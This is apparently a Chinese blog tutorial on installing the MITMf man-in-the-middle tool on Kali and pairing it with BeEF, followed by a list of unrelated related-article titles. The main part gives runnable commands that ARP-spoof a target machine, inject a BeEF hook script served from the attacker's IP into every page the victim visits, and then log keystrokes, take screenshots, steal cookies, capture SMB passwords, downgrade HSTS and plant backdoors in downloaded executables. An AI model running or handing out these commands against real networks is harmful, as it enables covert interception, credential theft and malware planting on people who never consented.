中间人攻击工具mitmf(另类的XSS注入攻击)

(一)简介

(二)安装

(三)结合beef使用

(一)简介

  Mitmf 是一款用来进行中间人攻击的工具。它可以结合 beef 一起来使用,并利用 beef 强大的 hook 脚本来控制目标客户端。下面让我们一起看看如何在 Kali2.0上安装使用 Mitmf 。默认在2.0上并未安装,在之前的版本有安装。

(二)安装

(1)安装环境

apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

(2)安装 mitmf

apt-get install mitmf

(3)卸载旧版的twisted

pip uninstall Twisted

 

(4)下载合适的twisted

wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2

  

(5)安装 twisted

pip install ./Twisted-15.5.0.tar.bz2

  

(三)结合beef使用

(1)启动beef

(2)打开beef的ui界面

访问  127.0.0.1:3000/ui/panel

(3)利用mitmf进行中间人XSS攻击

攻击者ip:192.168.14.157

虚拟机ip:192.168.14.158

网关:192.168.14.2

mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --inject --js-url http://192.168.14.157:3000/hook.js

  

(4)查看欺骗是否成功

(5)注入XSS代码

只要用户对任何网站进行对应访问,访问页面中就被插入js代码

接下来就可以使用beef进行对应控制

受害者电脑上访问任意站点

现在我们查看网站源代码,发现被注入了代码

在beef界面上也有了被hook的主机

双击被hook的主机就可以看到详细信息

然后就可以使用beef的各种模块进行更多的测试了

(6)更多使用

查看更多功能

mitmf -h

  

键盘记录器 

mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --jskeylogger

  

倒置图片

mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --upsidedownterne

  

截屏(默认截图保存在/var/log/mitmf,每十秒截屏一次)

mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --screen

  

抓取cookie信息

mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --ferretng

  

检测客户端浏览器及插件信息

mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --browserprofiler

  

获取smb密码

mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --smbtrap
mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --smbauth

  

降级hsts攻击

HTTP strict Transport Security

防止协议降级、cookie窃取

安全策略通过HTTP响应头 "HTTP strict Transport Security"实施

限制user-agent、https等

mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --hsts

  

凌空插后门

需要结合metsploit使用

对传输过程的exe中插入后门,并不是每一个exe程序都能插入后门

mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --filepwn

  

中间人攻击工具mitmf(另类的XSS注入攻击)的更多相关文章

  1. 关于在线文本编辑器防XSS注入攻击问题

    跨站脚本攻击,又称XSS代码攻击,也是一种常见的脚本注入攻击.例如在下面的界面上,很多输入框是可以随意输入内容的,特别是一些文本编辑框里面,可以输入例如<script>alert('这是一 ...

  2. StringEscapeUtils的常用使用,防止SQL注入及XSS注入

    StringEscapeUtils的常用使用,防止SQL注入及XSS注入 2017年10月20日 11:29:44 小狮王 阅读数:8974   版权声明:本文为博主原创文章,转载请注明出处. htt ...

  3. 解析如何防止XSS跨站脚本攻击

    2012-11-20 09:03 (分类:网络安全) 这些规则适用于所有不同类别的XSS跨站脚本攻击,可以通过在服务端执行适当的解码来定位映射的XSS以及存储的XSS,由于XSS也存在很多特殊情况,因 ...

  4. SQL注入攻击浅谈

    原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据 ...

  5. Web安全攻防(一)XSS注入和CSRF

    跨站脚本攻击(XSS) XSS(Cross Site Scripting),为不和层叠样式表CSS混淆,故将跨站脚本攻击缩写为XSS. 攻击原理: 恶意攻击者往Web页面里插入恶意Script代码,当 ...

  6. SQL注入攻击

    SQL注入攻击是黑客对数据库进行攻击的常用手段之一.随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多.但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候, ...

  7. xss(跨站脚本攻击),crsf(跨站请求伪造),xssf

    我们常说的网络安全其实应该包括以下三方面的安全: 1.机密性,比如用户的隐私被窃取,帐号被盗,常见的方式是木马. 2.完整性,比如数据的完整,举个例子,康熙传位十四子,被当时四阿哥篡改遗诏:传位于四子 ...

  8. SQL注入攻击的种类和防范手段

    观察近来的一些安全事件及其后果,安全专家们已经得到一个结论,这些威胁主要是通过SQL注入造成的.虽然前面有许多文章讨论了SQL注入,但今天所讨论的内容也许可帮助你检查自己的服务器,并采取相应防范措施. ...

  9. SQL注入攻击[详解]

    SQL注入攻击是黑客对数据库进行攻击的常用手段之一.随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多.但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候, ...

随机推荐

  1. WARN bzip2.Bzip2Factory: Failed to load/initialize native-bzip2 library system-native, will use pure-Java version

    [root@hdp2 /root]#hadoop checknative -a 18/12/09 00:31:19 WARN bzip2.Bzip2Factory: Failed to load/in ...

  2. spring-framework-x.x.x.RELEASE-dist下载教程

    1.打开Spring官网:https://spring.io,点击PROJECTS 2.点击SPRING FRAMEWORK 3.点击GitHub图标 4.找到Access to Binaries,点 ...

  3. 2017-2018-2 20155303『网络对抗技术』Final:Web渗透获取WebShell权限

    2017-2018-2 『网络对抗技术』Final:Web渗透获取WebShell权限 --------CONTENTS-------- 一.Webshell原理 1.什么是WebShell 2.We ...

  4. sql 中的null值

    1.包含null的表达式都为空 select salary*12+nvl(bonus,0) nvl是虑空函数 2. null值永远!=null select  * from emp  where bo ...

  5. k64 datasheet学习笔记3---Chip Configuration之Clock modules

    1.前言 本文主要讲述chip configure之clock配置相关的内容,主要包含如下三个部分: MCG configuration:Multipurpose clock generator OS ...

  6. JavaScript——封装

    封装:使用对象封装的好处是可以减少全局变量污染的机会,讲属性,函数都隶属一个对象. 封装前: <script> var name="foo"; //name是全局的,被 ...

  7. Go语言规格说明书 之 通道 发送语句(send) 和 接收操作符(receive)

    go version go1.11 windows/amd64 本文为阅读Go语言中文官网的规则说明书(https://golang.google.cn/ref/spec)而做的笔记,介绍Go语言的 ...

  8. sqlserver服务启动后停止,传递给数据库 'master' 中的日志扫描操作的日志扫描号无效

    电脑异常重启,导致SqlServer服务启动后,自动停止,在[计算机管理]-[事件查看器]-[windows日志]中进行查看系统错误日志,在[应用程序]下发现可能的错误信息有以下两条: 1.错误:传递 ...

  9. NodeJs>------->>第二章:Node.js中交互式运行环境--------REL

    第二章:Node.js中交互式运行环境--------REL 一:REPL运行环境概述 C:\Users\junliu>node > foo = 'bar' ; 'bar' > 二: ...

  10. python3之MongoDB

    1.MongoDB简介 MongoDB 是由C++语言编写的,是一个基于分布式文件存储的开源数据库系统. 在高负载的情况下,添加更多的节点,可以保证服务器性能. MongoDB 旨在为WEB应用提供可 ...